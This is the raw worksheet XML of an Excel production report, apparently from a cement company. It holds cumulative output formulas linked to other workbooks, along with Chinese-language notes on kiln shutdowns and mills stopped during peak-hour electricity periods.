      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]13'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]13'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]13'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'12'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]13'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'12'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]13'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'12'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'12'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]13'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]13'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]13'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'12'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]13'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'12'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]13'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'12'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'12'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]13'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]13'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]13'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'12'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]13'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'12'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]13'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]13'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]13'!$E$24</f>
        <v>4202</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'12'!H51</f>
        <v>65298.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1441697.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]13'!$I$24</f>
        <v>4346.811</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'12'!K51</f>
        <v>65119.22</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1428243.151</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]13'!$L$24</f>
        <v>48878.4639999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>108.618808888888</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]13'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]13'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]13'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'12'!U51</f>
        <v>3001.33</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>65999.801</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]13'!$V$30</f>
        <v>179</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'12'!X51</f>
        <v>2747.838</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63364.075</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]13'!$Y$30</f>
        <v>3504.86600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]13'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]13'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'12'!H52</f>
        <v>2.6e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]13'!$I$19</f>
        <v>3158</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'12'!K52</f>
        <v>63492.978</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1345187.178</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]13'!$L$19</f>
        <v>41553.4650000505</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>28.6575620690003</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'[13]13'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]13'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'12'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]13'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'12'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]13'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]13'!$M$21+'[14]13'!$M$22+'[14]13'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]13'!$N$21+'[14]13'!$N$22+'[14]13'!$N$35</f>
        <v>40.93</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'12'!U53</f>
        <v>641.66</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38976.087</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]13'!$Q$21+'[14]13'!$Q$22+'[14]13'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'12'!X53</f>
        <v>627</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40118</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]13'!$T$21+'[14]13'!$T$22+'[14]13'!$T$35</f>
        <v>1663.607</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]13'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'12'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]13'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'12'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]13'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]13'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]13'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]13'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'12'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]13'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'12'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]13'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]13'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'12'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]13'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'12'!K55</f>
        <v>4146.853</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>39582.503</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]13'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]13'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]13'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]13'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]13'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]13'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]13'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]13'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]13'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'12'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'12'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]13'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：大修续停；4#磨：8:00-22:40避峰停机。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G57+'12'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'12'!K57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G58+'12'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'12'!K58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G59+'12'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'12'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]13'!$Q$65</f>
        <v>窑:正常。A组磨：16:55-24:00避峰停机。D1#磨：正常，D2#磨：正常。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G60+'12'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'12'!K60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'[14]13'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]13'!$E$6</f>
        <v>4772</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'12'!H61</f>
        <v>47589</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1163462</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]13'!$E$21</f>
        <v>4080.07</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'12'!K61</f>
        <v>50725.42</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1151885.5</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]13'!$H$6</f>
        <v>34632.7499999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>66.6014423076921</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'[14]13'!$M$11+'[14]13'!$M$12+'[14]13'!$M$13+'[14]13'!$M$14+'[14]13'!$M$15+'[14]13'!$M$16+'[14]13'!$M$17+'[14]13'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]13'!$N$11+'[14]13'!$N$12+'[14]13'!$N$13+'[14]13'!$N$14+'[14]13'!$N$15+'[14]13'!$N$16+'[14]13'!$N$17+'[14]13'!$N$18</f>
        <v>3752</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'12'!H62</f>
        <v>32227</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>868220.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]13'!$Q$11+'[14]13'!$Q$12+'[14]13'!$Q$13+'[14]13'!$Q$14+'[14]13'!$Q$15+'[14]13'!$Q$16+'[14]13'!$Q$17+'[14]13'!$Q$18</f>
        <v>3436</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'12'!K62</f>
        <v>34265</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>868737.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]13'!$T$11+'[14]13'!$T$12+'[14]13'!$T$13+'[14]13'!$T$14+'[14]13'!$T$15+'[14]13'!$T$16+'[14]13'!$T$17+'[14]13'!$T$18</f>
        <v>16416.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>65.6665359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]13'!$Q$71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'[14]13'!$M$19+'[14]13'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]13'!$N$19+'[14]13'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'12'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]13'!$Q$19+'[14]13'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'12'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]13'!$T$19+'[14]13'!$T$20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G64+'12'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'12'!K64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G65+'12'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'12'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]13'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:9:45-22:15避峰停机。2#磨:8:00-22:25避峰停机。3#磨:8:00-24:00避峰停机。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G66+'12'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'12'!K66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G67+'12'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'12'!K67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'[15]13'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]13'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'12'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]13'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'12'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]13'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]13'!$Q$77</f>
        <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]13'!$D$43+'[15]13'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]13'!$E$43+'[15]13'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'12'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]13'!$H$43+'[15]13'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'12'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]13'!$K$43+'[15]13'!$K$44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'[15]13'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]13'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'12'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]13'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'12'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]13'!$K$45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G71+'12'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'12'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]13'!$Q$80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G72+'12'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'12'!K72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G73+'12'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'12'!K73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G74+'12'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'12'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]13'!$Q$83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G75+'12'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'12'!K75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G76+'12'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'12'!K76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G77+'12'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'12'!K77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G78+'12'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'12'!K78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'[16]13'!$E$7</f>
        <v>391.96</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'12'!H79</f>
        <v>6964.84</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>154093.31</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]13'!$I$7</f>
        <v>444</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'12'!K79</f>
        <v>6691.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>148582.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]13'!$L$7</f>
        <v>5158.12</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.31624</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'[16]13'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'12'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]13'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'12'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]13'!$Y$15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G81+'12'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'12'!K81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G82+'12'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'12'!K82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G83+'12'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'12'!K83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G84+'12'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'12'!K84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G85+'12'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'12'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E23"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14/31</f>
        <v>0.451612903225806</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46005</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19646.28</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'13'!H5</f>
        <v>296497.93</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6451363.96</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>22451.55</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'13'!K5</f>
        <v>318790.99</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6468862.121</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>245174.764</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>65.5547497326202</v>
      </c>
